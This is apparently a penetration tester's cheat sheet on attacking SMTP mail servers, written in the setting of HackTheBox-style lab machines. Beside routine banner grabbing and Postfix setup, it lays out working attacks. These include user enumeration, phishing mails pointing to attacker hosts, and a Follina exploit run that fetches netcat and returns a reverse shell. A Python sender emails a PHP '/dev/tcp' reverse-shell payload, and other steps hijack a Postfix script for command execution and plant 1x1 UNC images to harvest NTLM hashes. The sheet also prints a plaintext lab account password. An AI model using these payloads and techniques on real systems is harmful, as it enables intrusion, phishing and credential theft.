25, 465, 587 - SMTP(S)

Banner Grabbing

// SMTP
nc -vn <IP> 25

// SMTPS
openssl s_client -crlf -connect smtp.mailgun.org:465     #SSL/TLS without starttls command
openssl s_client -starttls smtp -crlf -connect smtp.mailgun.org:587

Find Organization MX Server

dig +short mx google.com

Remote - Connect to SMTP server with netcat

kyle@writer:/etc/postfix$ nc localhost 25
220 writer.htb ESMTP Postfix (Ubuntu)
HELO writer.htb
  250 writer.htb
MAIL FROM:<kyle@writer.htb>
  250 2.1.0 Ok
RCPT TO:<kyle@writer.htb>
  250 2.1.5 Ok
DATA
  354 End data with <CR><LF>.<CR><LF>
Subject: This is a email.
.
  250 2.0.0 Ok: queued as 9FF0C802

Remote - NTML Auth

$ telnet example.com 587 
220 example.com SMTP Server Banner 
>> HELO 
250 example.com Hello [x.x.x.x] 
>> AUTH NTLM 334 
NTLM supported 
>> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= 
334 TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABCAAAABgOAJQAAAA9JAEkAUwAwADEAAgAKAEkASQBTADAAMQABAAoASQBJAFMAMAAxAAQACgBJAEkAUwAwADEAAwAKAEkASQBTADAAMQAHAAgAHwMI0VPy1QEAAAAA

Remote - Enum Users

$ telnet 10.0.10.1 25
 220 myhost ESMTP Sendmail 8.9.3
HELO x
 250 myhost Hello [10.0.0.99], pleased to meet you
MAIL FROM:test@test.org
 250 2.1.0 test@test.org... Sender ok

// RCPT TO
RCPT TO:test
 550 5.1.1 test... User unknown
RCPT TO:admin
 550 5.1.1 admin... User unknown
RCPT TO:ed
 250 2.1.5 ed... Recipient ok
 
// VRFY
VRFY root
 250 Super-User <root@myhost>
VRFY blah
 550 blah... User unknown

// EXPN
EXPN test
 550 5.1.1 test... User unknown
EXPN root
 250 2.1.5 <ed.williams@myhost>
EXPN sshd
 250 2.1.5 sshd privsep <sshd@mail2>

Local - Setup Postfix SMTP server

// Install & Configure
$ apt install mailutils postfix
$ sudo postconf -e "mydestination = $myhostname, void, localhost.localdomain, localhost"
$ sudo postconf -e "mynetworks = 127.0.0.0/8, 10.10.14.0/24"
$ sudo postconf -e "inet_interfaces = all"
$ sudo postconf -e "inet_protocols = ipv4"
$ sudo postconf -e "recipient_delimiter = +"
$ sudo postconf -e "lmtp_host_lookup = native"
$ sudo postconf -e "smtp_host_lookup = native"
$ service postfix restart

// Send mail
$ telnet localhost 25
220 void.xxxxx.se ESMTP Postfix (Debian/GNU)
ehlo localhost
250-void.xxxxx.se
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250-SMTPUTF8
250 CHUNKING
mail from: void@void
250 2.1.0 Ok
rcpt to: itsupport@outdated.htb
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
Subject: Phishing
http://10.10.14.6:8080
.
250 2.0.0 Ok: queued as 0C51812101C
quit
221 2.0.0 Bye

// Verify that status=sent
$ cat /var/log/mail.log
[... snip ...]
Aug 15 10:51:28 void postfix/smtp[7917]: 0C51812101C: to=<itsupport@outdated.htb>, relay=outdated.htb[10.10.11.175]:25, delay=54, delays=43/0.01/0.08/11, dsn=2.0.0, status=sent (250 Queued (10.432 seconds))

Local - Swaks

$ swaks --to itsupport@outdated.htb --from 0xpthree@exploit.se --server mail.outdated.htb --body "http://10.10.14.6/pwn.html"
=== Trying mail.outdated.htb:25...
=== Connected to mail.outdated.htb.
<-  220 mail.outdated.htb ESMTP
 -> EHLO void
<-  250-mail.outdated.htb
<-  250-SIZE 20480000
<-  250-AUTH LOGIN
<-  250 HELP
 -> MAIL FROM:<0xpthree@exploit.se>
<-  250 OK
 -> RCPT TO:<itsupport@outdated.htb>
<-  250 OK
 -> DATA
<-  354 OK, send.
 -> Date: Mon, 15 Aug 2022 15:14:51 +0200
 -> To: itsupport@outdated.htb
 -> From: 0xpthree@exploit.se
 -> Subject: test Mon, 15 Aug 2022 15:14:51 +0200
 -> Message-Id: <20220815151451.031141@void>
 -> X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/
 -> 
 -> http://10.10.14.6/pwn.html
 -> 
 -> 
 -> .
<-  250 Queued (10.406 seconds)
 -> QUIT
<-  221 goodbye

Local - sendEmail (MSDT Follina example)

// Script used: https://github.com/JohnHammond/msdt-follina
//
// follina.py row 111:
// command = f"""Invoke-WebRequest http://10.10.14.2:4444/nc64.exe -OutFile C:\\Windows\\Tasks\\nc.exe; C:\\Windows\\Tasks\\nc.exe -e cmd.exe {serve_host} {args.reverse}"""

$ ls -al /tmp/67gup9zc/www
total 64
drwxr-xr-x 2 void void  4096 Aug 19 13:04 .
drwxr-xr-x 4 void void  4096 Aug 19 12:54 ..
-rw-r--r-- 1 void void  4689 Aug 19 12:54 index.html
-rwxr-xr-x 1 void void 45272 Aug 19 13:04 nc64.exe

$ sendEmail -t itsupport@outdated.htb -f 0xpthree@exploit.se -s mail.outdated.htb -u PleaseWork -m 'http://10.10.14.2/'
Aug 19 12:54:31 void sendEmail[17349]: Email was sent successfully!

$ python3 follina.py -i tun0 -p 80 -r 4444     
[+] copied staging doc /tmp/67gup9zc
[+] created maldoc ./follina.doc
[+] serving html payload on :80
[+] starting 'nc -lvnp 4444' 
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.11.175] 49822
Microsoft Windows [Version 10.0.19043.928]
(c) Microsoft Corporation. All rights reserved.

C:\Users\btables\AppData\Local\Temp\SDIAG_9fb3a047-99c4-4779-8d48-a154f6f5936e> whoami
outdated\btables

Local - Thunderbird GUI

An alternative if you need to check another users inbox and/or sent emails. Need creds!

Download and install the email client thunderbird. Upon first start enter the following:

Your name: Paul Byrd
Email Address: paulbyrd@sneakymailer.htb
Password: ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

Press 'Continue'. It will fail to find the server, change to following:
INCOMING
 Protocol: IMAP
 Server Hostname: sneakymailer.htb
 Port: 143
 SSL: None
 Authentication: Normal Password

OUTGOING
 Protocol: SMTP
 Server Hostname: sneakymailer.htb
 Port: 25
 SSL: None
 Authentication: Normal Password

Press 'Done', check 'I understand the risks' and then 'Done'. Restart thunderbird and you'll be connected to Paul Byrd's email.

Local - Send mail using Pyhon

from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import smtplib
import sys

lhost = "127.0.0.1"
lport = 443
rhost = "192.168.1.1"
rport = 25 # 489,587

# create message object instance
msg = MIMEMultipart()

# setup the parameters of the message
password = "" 
msg['From'] = "attacker@local"
msg['To'] = "victim@local"
msg['Subject'] = "This is not a drill!"

# payload 
message = ("<?php system('bash -i >& /dev/tcp/%s/%d 0>&1'); ?>" % (lhost,lport))

print("[*] Payload is generated : %s" % message)

msg.attach(MIMEText(message, 'plain'))
server = smtplib.SMTP(host=rhost,port=rport)

if server.noop()[0] != 250:
    print("[-]Connection Error")
    exit()

server.starttls()

# Uncomment if log-in with authencation
# server.login(msg['From'], password)

server.sendmail(msg['From'], msg['To'], msg.as_string())
server.quit()

print("[***]successfully sent email to %s:" % (msg['To']))

Interesting Files

sendmail.cf
submit.cf
/etc/postfix/master.cf
C:\Nuxeo\conf\Catalina\localhost\nuxeo.xml

Postfix master.cf

Contains scripts to be executed if condition is met.

$ cat /etc/postfix/master.cf
flags=DRhu user=vmail argv=/usr/bin/maildrop -d ${recipient}
#  user=cyrus argv=/cyrus/bin/deliver -e -r ${sender} -m ${extension} ${user}
#  flags=R user=cyrus argv=/cyrus/bin/deliver -e -m ${extension} ${user}
flags=Fqhu user=uucp argv=uux -r -n -z -a$sender - $nexthop!rmail ($recipient)
flags=F user=ftn argv=/usr/lib/ifmail/ifmail -r $nexthop ($recipient)
flags=Fq. user=bsmtp argv=/usr/lib/bsmtp/bsmtp -t$nexthop -f$sender $recipient
flags=R user=scalemail argv=/usr/lib/scalemail/bin/scalemail-store ${nexthop} ${user} ${extension}
flags=FR user=list argv=/usr/lib/mailman/bin/postfix-to-mailman.py
flags=Rq user=john argv=/etc/postfix/disclaimer -f ${sender} -- ${recipient}

Analyzing the last line means /etc/postfix/disclaimer will be executed if a new mail is received from user john.

$ ls -al | grep discl
  -rwxrwxr-x   1 root filter  1022 Sep 10 13:44 disclaimer

Edit disclaimer-file to execute whatever bash commands you'd like and send an email to trigger it.

Force NTLM Authentication

In the real world, it's unlikely you can just jump onto the console of a machine as a privileged user and authenticate to your malicious SMB server. Nor can you do NTLM authentication on demand, but there are lots of techniquest to "force" the user to do it unknowingly.

1x1 Images in Emails:

<img src="\\10.10.17.231\test.ico" height="1" width="1" />

A sneaky way would be to modify the email signature, so that even legitimate emails send will trigger NTLM authentication from every recipient who reads them.